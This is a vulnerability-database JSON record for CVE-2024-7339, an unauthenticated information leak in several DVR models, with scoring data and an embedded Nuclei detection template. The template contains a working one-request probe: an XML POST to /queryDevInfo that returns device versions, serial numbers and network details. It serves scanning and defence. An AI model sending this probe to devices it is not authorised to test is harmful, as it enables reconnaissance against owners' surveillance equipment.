{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-7339/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-7339/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-7339/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-7339/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-7339/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-7339"},"sightings":{"href":"/api/v1/sightings/cve-2024-7339"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.32028,"kev":false,"percentile":0.98253},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-7339.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2024-7339\n\ninfo:\n  name: TVT DVR Sensitive Device - Information Disclosure\n  author: Stuxctf\n  severity: medium\n  description: |\n    A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.\n  impact: |\n    An attacker get detailed device information including hardware and software versions, serial numbers, and network configuration.\n  remediation: |\n    Implement strict access controls and authentication mechanisms to manage access to the device interfaces.\n  reference:\n    - https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d\n    - https://netsecfish.notion.site/Sensitive-Device-Information-Disclosure-in-TVT-DVR-fad1cce703d946969be5130bf3aaac0d?pvs=4\n    - https://vuldb.com/?ctiid.273262\n    - https://vuldb.com/?id.273262\n    - https://vuldb.com/?submit.379373\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2024-7339\n    cwe-id: CWE-200\n    epss-score: 0.32028\n    epss-percentile: 0.98253\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2024,dvr,tvt,info-leak,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /queryDevInfo HTTP/1.1\n        Host: {{Hostname}}\n\n        <?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"/>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"softwareVersion\"\n          - \"eth0\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b3b9b9fd8853565174d0295c000f6d12a8e7180f505bc2457349205e244c9c0f022100f3a77d0c8bf75325d905ffb72935528da726c0727cd1145bb6dcef8b2b421e04:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-7339"}